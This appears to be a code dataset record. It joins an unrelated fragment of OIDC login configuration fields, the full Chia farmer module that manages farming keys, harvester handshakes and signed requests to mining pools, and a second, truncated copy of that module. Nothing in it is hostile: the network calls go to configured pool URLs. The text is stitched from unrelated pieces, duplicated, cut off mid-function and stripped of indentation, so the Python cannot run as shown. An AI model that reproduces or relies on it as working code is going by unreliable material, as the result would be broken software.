authorization_endpoint: Optional[str]
# the oauth2 token endpoint. Required if discovery is disabled.
token_endpoint: Optional[str]
# the OIDC userinfo endpoint. Required if discovery is disabled and the
# "openid" scope is not requested.
userinfo_endpoint: Optional[str]
# URI where to fetch the JWKS. Required if discovery is disabled and the
# "openid" scope is used.
jwks_uri: Optional[str]
# Whether to skip metadata verification
skip_verification: bool
# Whether to fetch the user profile from the userinfo endpoint. Valid
# values are: "auto" or "userinfo_endpoint".
user_profile_method: str
# whether to allow a user logging in via OIDC to match a pre-existing account
# instead of failing
allow_existing_users: bool
# the class of the user mapping provider
user_mapping_provider_class: Type
# the config of the user mapping provider
user_mapping_provider_config: Any
# required attributes to require in userinfo to allow login/registration
attribute_requirements: List[SsoAttributeRequirement]
|
import asyncio
import json
import logging
import time
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Tuple
import traceback
import aiohttp
from blspy import AugSchemeMPL, G1Element, G2Element, PrivateKey
import chia.server.ws_connection as ws # lgtm [py/import-and-import-from]
from chia.consensus.coinbase import create_puzzlehash_for_pk
from chia.consensus.constants import ConsensusConstants
from chia.daemon.keychain_proxy import (
KeychainProxy,
KeychainProxyConnectionFailure,
connect_to_keychain_and_validate,
wrap_local_keychain,
)
from chia.plot_sync.receiver import Receiver
from chia.plot_sync.delta import Delta
from chia.pools.pool_config import PoolWalletConfig, load_pool_config, add_auth_key
from chia.protocols import farmer_protocol, harvester_protocol
from chia.protocols.pool_protocol import (
ErrorResponse,
get_current_authentication_token,
GetFarmerResponse,
PoolErrorCode,
PostFarmerPayload,
PostFarmerRequest,
PutFarmerPayload,
PutFarmerRequest,
AuthenticationPayload,
)
from chia.protocols.protocol_message_types import ProtocolMessageTypes
from chia.server.outbound_message import NodeType, make_msg
from chia.server.server import ssl_context_for_root
from chia.server.ws_connection import WSChiaConnection
from chia.ssl.create_ssl import get_mozilla_ca_crt
from chia.types.blockchain_format.proof_of_space import ProofOfSpace
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.util.bech32m import decode_puzzle_hash
from chia.util.byte_types import hexstr_to_bytes
from chia.util.config import load_config, lock_and_load_config, save_config, config_path_for_filename
from chia.util.hash import std_hash
from chia.util.ints import uint8, uint16, uint32, uint64
from chia.util.keychain import Keychain
from chia.wallet.derive_keys import (
master_sk_to_farmer_sk,
master_sk_to_pool_sk,
master_sk_to_wallet_sk,
find_authentication_sk,
find_owner_sk,
)
from chia.wallet.puzzles.singleton_top_layer import SINGLETON_MOD
singleton_mod_hash = SINGLETON_MOD.get_tree_hash()
log = logging.getLogger(__name__)
UPDATE_POOL_INFO_INTERVAL: int = 3600
UPDATE_POOL_FARMER_INFO_INTERVAL: int = 300
"""
HARVESTER PROTOCOL (FARMER <-> HARVESTER)
"""
class Farmer:
def __init__(
self,
root_path: Path,
farmer_config: Dict,
pool_config: Dict,
consensus_constants: ConsensusConstants,
local_keychain: Optional[Keychain] = None,
):
self.keychain_proxy: Optional[KeychainProxy] = None
self.local_keychain = local_keychain
self._root_path = root_path
self.config = farmer_config
self.pool_config = pool_config
# Keep track of all sps, keyed on challenge chain signage point hash
self.sps: Dict[bytes32, List[farmer_protocol.NewSignagePoint]] = {}
# Keep track of harvester plot identifier (str), target sp index, and PoSpace for each challenge
self.proofs_of_space: Dict[bytes32, List[Tuple[str, ProofOfSpace]]] = {}
# Quality string to plot identifier and challenge_hash, for use with harvester.RequestSignatures
self.quality_str_to_identifiers: Dict[bytes32, Tuple[str, bytes32, bytes32, bytes32]] = {}
# number of responses to each signage point
self.number_of_responses: Dict[bytes32, int] = {}
# A dictionary of keys to time added. These keys refer to keys in the above 4 dictionaries. This is used
# to periodically clear the memory
self.cache_add_time: Dict[bytes32, uint64] = {}
self.plot_sync_receivers: Dict[bytes32, Receiver] = {}
self.cache_clear_task: Optional[asyncio.Task] = None
self.update_pool_state_task: Optional[asyncio.Task] = None
self.constants = consensus_constants
self._shut_down = False
self.server: Any = None
self.state_changed_callback: Optional[Callable] = None
self.log = log
self.started = False
self.harvester_handshake_task: Optional[asyncio.Task] = None
# From p2_singleton_puzzle_hash to pool state dict
self.pool_state: Dict[bytes32, Dict] = {}
# From p2_singleton to auth PrivateKey
self.authentication_keys: Dict[bytes32, PrivateKey] = {}
# Last time we updated pool_state based on the config file
self.last_config_access_time: uint64 = uint64(0)
async def ensure_keychain_proxy(self) -> KeychainProxy:
if self.keychain_proxy is None:
if self.local_keychain:
self.keychain_proxy = wrap_local_keychain(self.local_keychain, log=self.log)
else:
self.keychain_proxy = await connect_to_keychain_and_validate(self._root_path, self.log)
if not self.keychain_proxy:
raise KeychainProxyConnectionFailure("Failed to connect to keychain service")
return self.keychain_proxy
async def get_all_private_keys(self):
keychain_proxy = await self.ensure_keychain_proxy()
return await keychain_proxy.get_all_private_keys()
async def setup_keys(self) -> bool:
no_keys_error_str = "No keys exist. Please run 'chia keys generate' or open the UI."
self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()]
self._private_keys = [master_sk_to_farmer_sk(sk) for sk in self.all_root_sks] + [
master_sk_to_pool_sk(sk) for sk in self.all_root_sks
]
if len(self.get_public_keys()) == 0:
log.warning(no_keys_error_str)
return False
config = load_config(self._root_path, "config.yaml")
if "xch_target_address" not in self.config:
self.config = config["farmer"]
if "xch_target_address" not in self.pool_config:
self.pool_config = config["pool"]
if "xch_target_address" not in self.config or "xch_target_address" not in self.pool_config:
log.debug("xch_target_address missing in the config")
return False
# This is the farmer configuration
self.farmer_target_encoded = self.config["xch_target_address"]
self.farmer_target = decode_puzzle_hash(self.farmer_target_encoded)
self.pool_public_keys = [G1Element.from_bytes(bytes.fromhex(pk)) for pk in self.config["pool_public_keys"]]
# This is the self pooling configuration, which is only used for original self-pooled plots
self.pool_target_encoded = self.pool_config["xch_target_address"]
self.pool_target = decode_puzzle_hash(self.pool_target_encoded)
self.pool_sks_map: Dict = {}
for key in self.get_private_keys():
self.pool_sks_map[bytes(key.get_g1())] = key
assert len(self.farmer_target) == 32
assert len(self.pool_target) == 32
if len(self.pool_sks_map) == 0:
log.warning(no_keys_error_str)
return False
return True
async def _start(self):
async def start_task():
# `Farmer.setup_keys` returns `False` if there are no keys setup yet. In this case we just try until it
# succeeds or until we need to shut down.
while not self._shut_down:
if await self.setup_keys():
self.update_pool_state_task = asyncio.create_task(self._periodically_update_pool_state_task())
self.cache_clear_task = asyncio.create_task(self._periodically_clear_cache_and_refresh_task())
log.debug("start_task: initialized")
self.started = True
return
await asyncio.sleep(1)
asyncio.create_task(start_task())
def _close(self):
self._shut_down = True
async def _await_closed(self, shutting_down: bool = True):
if self.cache_clear_task is not None:
await self.cache_clear_task
if self.update_pool_state_task is not None:
await self.update_pool_state_task
if shutting_down and self.keychain_proxy is not None:
proxy = self.keychain_proxy
self.keychain_proxy = None
await proxy.close()
await asyncio.sleep(0.5) # https://docs.aiohttp.org/en/stable/client_advanced.html#graceful-shutdown
self.started = False
def _set_state_changed_callback(self, callback: Callable):
self.state_changed_callback = callback
async def on_connect(self, peer: WSChiaConnection):
self.state_changed("add_connection", {})
async def handshake_task():
# Wait until the task in `Farmer._start` is done so that we have keys available for the handshake. Bail out
# early if we need to shut down or if the harvester is not longer connected.
while not self.started and not self._shut_down and peer in self.server.get_connections():
await asyncio.sleep(1)
if self._shut_down:
log.debug("handshake_task: shutdown")
self.harvester_handshake_task = None
return
if peer not in self.server.get_connections():
log.debug("handshake_task: disconnected")
self.harvester_handshake_task = None
return
# Sends a handshake to the harvester
handshake = harvester_protocol.HarvesterHandshake(
self.get_public_keys(),
self.pool_public_keys,
)
msg = make_msg(ProtocolMessageTypes.harvester_handshake, handshake)
await peer.send_message(msg)
self.harvester_handshake_task = None
if peer.connection_type is NodeType.HARVESTER:
self.plot_sync_receivers[peer.peer_node_id] = Receiver(peer, self.plot_sync_callback)
self.harvester_handshake_task = asyncio.create_task(handshake_task())
def set_server(self, server):
self.server = server
def state_changed(self, change: str, data: Dict[str, Any]):
if self.state_changed_callback is not None:
self.state_changed_callback(change, data)
def handle_failed_pool_response(self, p2_singleton_puzzle_hash: bytes32, error_message: str):
self.log.error(error_message)
self.pool_state[p2_singleton_puzzle_hash]["pool_errors_24h"].append(
ErrorResponse(uint16(PoolErrorCode.REQUEST_FAILED.value), error_message).to_json_dict()
)
def on_disconnect(self, connection: ws.WSChiaConnection):
self.log.info(f"peer disconnected {connection.get_peer_logging()}")
self.state_changed("close_connection", {})
if connection.connection_type is NodeType.HARVESTER:
del self.plot_sync_receivers[connection.peer_node_id]
async def plot_sync_callback(self, peer_id: bytes32, delta: Delta) -> None:
log.info(f"plot_sync_callback: peer_id {peer_id}, delta {delta}")
if not delta.empty():
self.state_changed("new_plots", await self.get_harvesters())
async def _pool_get_pool_info(self, pool_config: PoolWalletConfig) -> Optional[Dict]:
try:
async with aiohttp.ClientSession(trust_env=True) as session:
async with session.get(
f"{pool_config.pool_url}/pool_info", ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log)
) as resp:
if resp.ok:
response: Dict = json.loads(await resp.text())
self.log.info(f"GET /pool_info response: {response}")
return response
else:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash,
f"Error in GET /pool_info {pool_config.pool_url}, {resp.status}",
)
except Exception as e:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash, f"Exception in GET /pool_info {pool_config.pool_url}, {e}"
)
return None
async def _pool_get_farmer(
self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, authentication_sk: PrivateKey
) -> Optional[Dict]:
authentication_token = get_current_authentication_token(authentication_token_timeout)
message: bytes32 = std_hash(
AuthenticationPayload(
"get_farmer", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token
)
)
signature: G2Element = AugSchemeMPL.sign(authentication_sk, message)
get_farmer_params = {
"launcher_id": pool_config.launcher_id.hex(),
"authentication_token": authentication_token,
"signature": bytes(signature).hex(),
}
try:
async with aiohttp.ClientSession(trust_env=True) as session:
async with session.get(
f"{pool_config.pool_url}/farmer",
params=get_farmer_params,
ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
) as resp:
if resp.ok:
response: Dict = json.loads(await resp.text())
log_level = logging.INFO
if "error_code" in response:
log_level = logging.WARNING
self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
self.log.log(log_level, f"GET /farmer response: {response}")
return response
else:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash,
f"Error in GET /farmer {pool_config.pool_url}, {resp.status}",
)
except Exception as e:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash, f"Exception in GET /farmer {pool_config.pool_url}, {e}"
)
return None
async def _pool_post_farmer(
self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey
) -> Optional[Dict]:
auth_sk: Optional[PrivateKey] = self.get_authentication_sk(pool_config)
assert auth_sk is not None
post_farmer_payload: PostFarmerPayload = PostFarmerPayload(
pool_config.launcher_id,
get_current_authentication_token(authentication_token_timeout),
auth_sk.get_g1(),
pool_config.payout_instructions,
None,
)
assert owner_sk.get_g1() == pool_config.owner_public_key
signature: G2Element = AugSchemeMPL.sign(owner_sk, post_farmer_payload.get_hash())
post_farmer_request = PostFarmerRequest(post_farmer_payload, signature)
self.log.debug(f"POST /farmer request {post_farmer_request}")
try:
async with aiohttp.ClientSession() as session:
async with session.post(
f"{pool_config.pool_url}/farmer",
json=post_farmer_request.to_json_dict(),
ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
) as resp:
if resp.ok:
response: Dict = json.loads(await resp.text())
log_level = logging.INFO
if "error_code" in response:
log_level = logging.WARNING
self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
self.log.log(log_level, f"POST /farmer response: {response}")
return response
else:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash,
f"Error in POST /farmer {pool_config.pool_url}, {resp.status}",
)
except Exception as e:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash, f"Exception in POST /farmer {pool_config.pool_url}, {e}"
)
return None
async def _pool_put_farmer(
self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey
) -> None:
auth_sk: Optional[PrivateKey] = self.get_authentication_sk(pool_config)
assert auth_sk is not None
put_farmer_payload: PutFarmerPayload = PutFarmerPayload(
pool_config.launcher_id,
get_current_authentication_token(authentication_token_timeout),
auth_sk.get_g1(),
pool_config.payout_instructions,
None,
)
assert owner_sk.get_g1() == pool_config.owner_public_key
signature: G2Element = AugSchemeMPL.sign(owner_sk, put_farmer_payload.get_hash())
put_farmer_request = PutFarmerRequest(put_farmer_payload, signature)
self.log.debug(f"PUT /farmer request {put_farmer_request}")
try:
async with aiohttp.ClientSession() as session:
async with session.put(
f"{pool_config.pool_url}/farmer",
json=put_farmer_request.to_json_dict(),
ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
) as resp:
if resp.ok:
response: Dict = json.loads(await resp.text())
log_level = logging.INFO
if "error_code" in response:
log_level = logging.WARNING
self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
self.log.log(log_level, f"PUT /farmer response: {response}")
else:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash,
f"Error in PUT /farmer {pool_config.pool_url}, {resp.status}",
)
except Exception as e:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash, f"Exception in PUT /farmer {pool_config.pool_url}, {e}"
)
def get_authentication_sk(self, pool_config: PoolWalletConfig) -> Optional[PrivateKey]:
if pool_config.p2_singleton_puzzle_hash in self.authentication_keys:
return self.authentication_keys[pool_config.p2_singleton_puzzle_hash]
auth_sk: Optional[PrivateKey] = find_authentication_sk(self.all_root_sks, pool_config.owner_public_key)
if auth_sk is not None:
self.authentication_keys[pool_config.p2_singleton_puzzle_hash] = auth_sk
return auth_sk
async def update_pool_state(self):
config = load_config(self._root_path, "config.yaml")
pool_config_list: List[PoolWalletConfig] = load_pool_config(self._root_path)
for pool_config in pool_config_list:
p2_singleton_puzzle_hash = pool_config.p2_singleton_puzzle_hash
try:
authentication_sk: Optional[PrivateKey] = self.get_authentication_sk(pool_config)
if authentication_sk is None:
self.log.error(f"Could not find authentication sk for {p2_singleton_puzzle_hash}")
continue
add_auth_key(self._root_path, pool_config, authentication_sk.get_g1())
if p2_singleton_puzzle_hash not in self.pool_state:
self.pool_state[p2_singleton_puzzle_hash] = {
"points_found_since_start": 0,
"points_found_24h": [],
"points_acknowledged_since_start": 0,
"points_acknowledged_24h": [],
"next_farmer_update": 0,
"next_pool_info_update": 0,
"current_points": 0,
"current_difficulty": None,
"pool_errors_24h": [],
"authentication_token_timeout": None,
}
self.log.info(f"Added pool: {pool_config}")
pool_state = self.pool_state[p2_singleton_puzzle_hash]
pool_state["pool_config"] = pool_config
# Skip state update when self pooling
if pool_config.pool_url == "":
continue
enforce_https = config["full_node"]["selected_network"] == "mainnet"
if enforce_https and not pool_config.pool_url.startswith("https://"):
self.log.error(f"Pool URLs must be HTTPS on mainnet {pool_config.pool_url}")
continue
# TODO: Improve error handling below, inform about unexpected failures
if time.time() >= pool_state["next_pool_info_update"]:
pool_state["next_pool_info_update"] = time.time() + UPDATE_POOL_INFO_INTERVAL
# Makes a GET request to the pool to get the updated information
pool_info = await self._pool_get_pool_info(pool_config)
if pool_info is not None and "error_code" not in pool_info:
pool_state["authentication_token_timeout"] = pool_info["authentication_token_timeout"]
# Only update the first time from GET /pool_info, gets updated from GET /farmer later
if pool_state["current_difficulty"] is None:
pool_state["current_difficulty"] = pool_info["minimum_difficulty"]
if time.time() >= pool_state["next_farmer_update"]:
pool_state["next_farmer_update"] = time.time() + UPDATE_POOL_FARMER_INFO_INTERVAL
authentication_token_timeout = pool_state["authentication_token_timeout"]
async def update_pool_farmer_info() -> Tuple[Optional[GetFarmerResponse], Optional[PoolErrorCode]]:
# Run a GET /farmer to see if the farmer is already known by the pool
response = await self._pool_get_farmer(
pool_config, authentication_token_timeout, authentication_sk
)
farmer_response: Optional[GetFarmerResponse] = None
error_code_response: Optional[PoolErrorCode] = None
if response is not None:
if "error_code" not in response:
farmer_response = GetFarmerResponse.from_json_dict(response)
if farmer_response is not None:
pool_state["current_difficulty"] = farmer_response.current_difficulty
pool_state["current_points"] = farmer_response.current_points
else:
try:
error_code_response = PoolErrorCode(response["error_code"])
except ValueError:
self.log.error(
f"Invalid error code received from the pool: {response["error_code"]}"
)
return farmer_response, error_code_response
if authentication_token_timeout is not None:
farmer_info, error_code = await update_pool_farmer_info()
if error_code == PoolErrorCode.FARMER_NOT_KNOWN:
# Make the farmer known on the pool with a POST /farmer
owner_sk_and_index: Optional[PrivateKey, uint32] = find_owner_sk(
self.all_root_sks, pool_config.owner_public_key
)
assert owner_sk_and_index is not None
post_response = await self._pool_post_farmer(
pool_config, authentication_token_timeout, owner_sk_and_index[0]
)
if post_response is not None and "error_code" not in post_response:
self.log.info(
f"Welcome message from {pool_config.pool_url}: "
f"{post_response["welcome_message"]}"
)
# Now we should be able to update the local farmer info
farmer_info, farmer_is_known = await update_pool_farmer_info()
if farmer_info is None and not farmer_is_known:
self.log.error("Failed to update farmer info after POST /farmer.")
# Update the farmer information on the pool if the payout instructions changed or if the
# signature is invalid (latter to make sure the pool has the correct authentication public key).
payout_instructions_update_required: bool = (
farmer_info is not None
and pool_config.payout_instructions.lower() != farmer_info.payout_instructions.lower()
)
if payout_instructions_update_required or error_code == PoolErrorCode.INVALID_SIGNATURE:
owner_sk_and_index: Optional[PrivateKey, uint32] = find_owner_sk(
self.all_root_sks, pool_config.owner_public_key
)
assert owner_sk_and_index is not None
await self._pool_put_farmer(
pool_config, authentication_token_timeout, owner_sk_and_index[0]
)
else:
self.log.warning(
f"No pool specific authentication_token_timeout has been set for {p2_singleton_puzzle_hash}"
f", check communication with the pool."
)
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Exception in update_pool_state for {pool_config.pool_url}, {e} {tb}")
def get_public_keys(self):
return [child_sk.get_g1() for child_sk in self._private_keys]
def get_private_keys(self):
return self._private_keys
async def get_reward_targets(self, search_for_private_key: bool) -> Dict:
if search_for_private_key:
all_sks = await self.get_all_private_keys()
stop_searching_for_farmer, stop_searching_for_pool = False, False
for i in range(500):
if stop_searching_for_farmer and stop_searching_for_pool and i > 0:
break
for sk, _ in all_sks:
ph = create_puzzlehash_for_pk(master_sk_to_wallet_sk(sk, uint32(i)).get_g1())
if ph == self.farmer_target:
stop_searching_for_farmer = True
if ph == self.pool_target:
stop_searching_for_pool = True
return {
"farmer_target": self.farmer_target_encoded,
"pool_target": self.pool_target_encoded,
"have_farmer_sk": stop_searching_for_farmer,
"have_pool_sk": stop_searching_for_pool,
}
return {
"farmer_target": self.farmer_target_encoded,
"pool_target": self.pool_target_encoded,
}
def set_reward_targets(self, farmer_target_encoded: Optional[str], pool_target_encoded: Optional[str]):
with lock_and_load_config(self._root_path, "config.yaml") as config:
if farmer_target_encoded is not None:
self.farmer_target_encoded = farmer_target_encoded
self.farmer_target = decode_puzzle_hash(farmer_target_encoded)
config["farmer"]["xch_target_address"] = farmer_target_encoded
if pool_target_encoded is not None:
self.pool_target_encoded = pool_target_encoded
self.pool_target = decode_puzzle_hash(pool_target_encoded)
config["pool"]["xch_target_address"] = pool_target_encoded
save_config(self._root_path, "config.yaml", config)
async def set_payout_instructions(self, launcher_id: bytes32, payout_instructions: str):
for p2_singleton_puzzle_hash, pool_state_dict in self.pool_state.items():
if launcher_id == pool_state_dict["pool_config"].launcher_id:
with lock_and_load_config(self._root_path, "config.yaml") as config:
new_list = []
pool_list = config["pool"].get("pool_list", [])
if pool_list is not None:
for list_element in pool_list:
if hexstr_to_bytes(list_element["launcher_id"]) == bytes(launcher_id):
list_element["payout_instructions"] = payout_instructions
new_list.append(list_element)
config["pool"]["pool_list"] = new_list
save_config(self._root_path, "config.yaml", config)
# Force a GET /farmer which triggers the PUT /farmer if it detects the changed instructions
pool_state_dict["next_farmer_update"] = 0
return
self.log.warning(f"Launcher id: {launcher_id} not found")
async def generate_login_link(self, launcher_id: bytes32) -> Optional[str]:
for pool_state in self.pool_state.values():
pool_config: PoolWalletConfig = pool_state["pool_config"]
if pool_config.launcher_id == launcher_id:
authentication_sk: Optional[PrivateKey] = self.get_authentication_sk(pool_config)
if authentication_sk is None:
self.log.error(f"Could not find authentication sk for {pool_config.p2_singleton_puzzle_hash}")
continue
authentication_token_timeout = pool_state["authentication_token_timeout"]
authentication_token = get_current_authentication_token(authentication_token_timeout)
message: bytes32 = std_hash(
AuthenticationPayload(
"get_login", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token
)
)
signature: G2Element = AugSchemeMPL.sign(authentication_sk, message)
return (
pool_config.pool_url
+ f"/login?launcher_id={launcher_id.hex()}&authentication_token={authentication_token}"
f"&signature={bytes(signature).hex()}"
)
return None
async def get_harvesters(self) -> Dict:
harvesters: List = []
for connection in self.server.get_connections(NodeType.HARVESTER):
self.log.debug(f"get_harvesters host: {connection.peer_host}, node_id: {connection.peer_node_id}")
receiver = self.plot_sync_receivers.get(connection.peer_node_id)
if receiver is not None:
harvesters.append(receiver.to_dict())
else:
self.log.debug(
f"get_harvesters invalid peer: {connection.peer_host}, node_id: {connection.peer_node_id}"
)
return {"harvesters": harvesters}
async def _periodically_update_pool_state_task(self):
time_slept: uint64 = uint64(0)
config_path: Path = config_path_for_filename(self._root_path, "config.yaml")
while not self._shut_down:
# Every time the config file changes, read it to check the pool state
stat_info = config_path.stat()
if stat_info.st_mtime > self.last_config_access_time:
# If we detect the config file changed, refresh private keys first just in case
self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()]
self.last_config_access_time = stat_info.st_mtime
await self.update_pool_state()
time_slept = uint64(0)
elif time_slept > 60:
await self.update_pool_state()
time_slept = uint64(0)
time_slept += 1
await asyncio.sleep(1)
async def _periodically_clear_cache_and_refresh_task(self):
time_slept: uint64 = uint64(0)
refresh_slept = 0
while not self._shut_down:
try:
if time_slept > self.constants.SUB_SLOT_TIME_TARGET:
now = time.time()
removed_keys: List[bytes32] = []
for key, add_time in self.cache_add_time.items():
if now - float(add_time) > self.constants.SUB_SLOT_TIME_TARGET * 3:
self.sps.pop(key, None)
self.proofs_of_space.pop(key, None)
self.quality_str_to_identifiers.pop(key, None)
self.number_of_responses.pop(key, None)
removed_keys.append(key)
for key in removed_keys:
self.cache_add_time.pop(key, None)
time_slept = uint64(0)
log.debug(
f"Cleared farmer cache. Num sps: {len(self.sps)} {len(self.proofs_of_space)} "
f"{len(self.quality_str_to_identifiers)} {len(self.number_of_responses)}"
)
time_slept += 1
refresh_slept += 1
# Periodically refresh GUI to show the correct download/upload rate.
if refresh_slept >= 30:
self.state_changed("add_connection", {})
refresh_slept = 0
except Exception:
log.error(f"_periodically_clear_cache_and_refresh_task failed: {traceback.format_exc()}")
await asyncio.sleep(1)
| import asyncio
import json
import logging
import time
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Tuple
import traceback
import aiohttp
from blspy import AugSchemeMPL, G1Element, G2Element, PrivateKey
import chia.server.ws_connection as ws # lgtm [py/import-and-import-from]
from chia.consensus.coinbase import create_puzzlehash_for_pk
from chia.consensus.constants import ConsensusConstants
from chia.daemon.keychain_proxy import (
KeychainProxy,
KeychainProxyConnectionFailure,
connect_to_keychain_and_validate,
wrap_local_keychain,
)
from chia.plot_sync.receiver import Receiver
from chia.plot_sync.delta import Delta
from chia.pools.pool_config import PoolWalletConfig, load_pool_config, add_auth_key
from chia.protocols import farmer_protocol, harvester_protocol
from chia.protocols.pool_protocol import (
ErrorResponse,
get_current_authentication_token,
GetFarmerResponse,
PoolErrorCode,
PostFarmerPayload,
PostFarmerRequest,
PutFarmerPayload,
PutFarmerRequest,
AuthenticationPayload,
)
from chia.protocols.protocol_message_types import ProtocolMessageTypes
from chia.server.outbound_message import NodeType, make_msg
from chia.server.server import ssl_context_for_root
from chia.server.ws_connection import WSChiaConnection
from chia.ssl.create_ssl import get_mozilla_ca_crt
from chia.types.blockchain_format.proof_of_space import ProofOfSpace
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.util.bech32m import decode_puzzle_hash
from chia.util.byte_types import hexstr_to_bytes
from chia.util.config import load_config, lock_and_load_config, save_config, config_path_for_filename
from chia.util.hash import std_hash
from chia.util.ints import uint8, uint16, uint32, uint64
from chia.util.keychain import Keychain
from chia.wallet.derive_keys import (
master_sk_to_farmer_sk,
master_sk_to_pool_sk,
master_sk_to_wallet_sk,
find_authentication_sk,
find_owner_sk,
)
from chia.wallet.puzzles.singleton_top_layer import SINGLETON_MOD
singleton_mod_hash = SINGLETON_MOD.get_tree_hash()
log = logging.getLogger(__name__)
UPDATE_POOL_INFO_INTERVAL: int = 3600
UPDATE_POOL_FARMER_INFO_INTERVAL: int = 300
"""
HARVESTER PROTOCOL (FARMER <-> HARVESTER)
"""
class Farmer:
def __init__(
self,
root_path: Path,
farmer_config: Dict,
pool_config: Dict,
consensus_constants: ConsensusConstants,
local_keychain: Optional[Keychain] = None,
):
self.keychain_proxy: Optional[KeychainProxy] = None
self.local_keychain = local_keychain
self._root_path = root_path
self.config = farmer_config
self.pool_config = pool_config
# Keep track of all sps, keyed on challenge chain signage point hash
self.sps: Dict[bytes32, List[farmer_protocol.NewSignagePoint]] = {}
# Keep track of harvester plot identifier (str), target sp index, and PoSpace for each challenge
self.proofs_of_space: Dict[bytes32, List[Tuple[str, ProofOfSpace]]] = {}
# Quality string to plot identifier and challenge_hash, for use with harvester.RequestSignatures
self.quality_str_to_identifiers: Dict[bytes32, Tuple[str, bytes32, bytes32, bytes32]] = {}
# number of responses to each signage point
self.number_of_responses: Dict[bytes32, int] = {}
# A dictionary of keys to time added. These keys refer to keys in the above 4 dictionaries. This is used
# to periodically clear the memory
self.cache_add_time: Dict[bytes32, uint64] = {}
self.plot_sync_receivers: Dict[bytes32, Receiver] = {}
self.cache_clear_task: Optional[asyncio.Task] = None
self.update_pool_state_task: Optional[asyncio.Task] = None
self.constants = consensus_constants
self._shut_down = False
self.server: Any = None
self.state_changed_callback: Optional[Callable] = None
self.log = log
self.started = False
self.harvester_handshake_task: Optional[asyncio.Task] = None
# From p2_singleton_puzzle_hash to pool state dict
self.pool_state: Dict[bytes32, Dict] = {}
# From p2_singleton to auth PrivateKey
self.authentication_keys: Dict[bytes32, PrivateKey] = {}
# Last time we updated pool_state based on the config file
self.last_config_access_time: uint64 = uint64(0)
async def ensure_keychain_proxy(self) -> KeychainProxy:
if self.keychain_proxy is None:
if self.local_keychain:
self.keychain_proxy = wrap_local_keychain(self.local_keychain, log=self.log)
else:
self.keychain_proxy = await connect_to_keychain_and_validate(self._root_path, self.log)
if not self.keychain_proxy:
raise KeychainProxyConnectionFailure("Failed to connect to keychain service")
return self.keychain_proxy
async def get_all_private_keys(self):
keychain_proxy = await self.ensure_keychain_proxy()
return await keychain_proxy.get_all_private_keys()
async def setup_keys(self) -> bool:
no_keys_error_str = "No keys exist. Please run 'chia keys generate' or open the UI."
self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()]
self._private_keys = [master_sk_to_farmer_sk(sk) for sk in self.all_root_sks] + [
master_sk_to_pool_sk(sk) for sk in self.all_root_sks
]
if len(self.get_public_keys()) == 0:
log.warning(no_keys_error_str)
return False
config = load_config(self._root_path, "config.yaml")
if "xch_target_address" not in self.config:
self.config = config["farmer"]
if "xch_target_address" not in self.pool_config:
self.pool_config = config["pool"]
if "xch_target_address" not in self.config or "xch_target_address" not in self.pool_config:
log.debug("xch_target_address missing in the config")
return False
# This is the farmer configuration
self.farmer_target_encoded = self.config["xch_target_address"]
self.farmer_target = decode_puzzle_hash(self.farmer_target_encoded)
self.pool_public_keys = [G1Element.from_bytes(bytes.fromhex(pk)) for pk in self.config["pool_public_keys"]]
# This is the self pooling configuration, which is only used for original self-pooled plots
self.pool_target_encoded = self.pool_config["xch_target_address"]
self.pool_target = decode_puzzle_hash(self.pool_target_encoded)
self.pool_sks_map: Dict = {}
for key in self.get_private_keys():
self.pool_sks_map[bytes(key.get_g1())] = key
assert len(self.farmer_target) == 32
assert len(self.pool_target) == 32
if len(self.pool_sks_map) == 0:
log.warning(no_keys_error_str)
return False
return True
async def _start(self):
async def start_task():
# `Farmer.setup_keys` returns `False` if there are no keys setup yet. In this case we just try until it
# succeeds or until we need to shut down.
while not self._shut_down:
if await self.setup_keys():
self.update_pool_state_task = asyncio.create_task(self._periodically_update_pool_state_task())
self.cache_clear_task = asyncio.create_task(self._periodically_clear_cache_and_refresh_task())
log.debug("start_task: initialized")
self.started = True
return
await asyncio.sleep(1)
asyncio.create_task(start_task())
def _close(self):
self._shut_down = True
async def _await_closed(self, shutting_down: bool = True):
if self.cache_clear_task is not None:
await self.cache_clear_task
if self.update_pool_state_task is not None:
await self.update_pool_state_task
if shutting_down and self.keychain_proxy is not None:
proxy = self.keychain_proxy
self.keychain_proxy = None
await proxy.close()
await asyncio.sleep(0.5) # https://docs.aiohttp.org/en/stable/client_advanced.html#graceful-shutdown
self.started = False
def _set_state_changed_callback(self, callback: Callable):
self.state_changed_callback = callback
async def on_connect(self, peer: WSChiaConnection):
self.state_changed("add_connection", {})
async def handshake_task():
# Wait until the task in `Farmer._start` is done so that we have keys available for the handshake. Bail out
# early if we need to shut down or if the harvester is not longer connected.
while not self.started and not self._shut_down and peer in self.server.get_connections():
await asyncio.sleep(1)
if self._shut_down:
log.debug("handshake_task: shutdown")
self.harvester_handshake_task = None
return
if peer not in self.server.get_connections():
log.debug("handshake_task: disconnected")
self.harvester_handshake_task = None
return
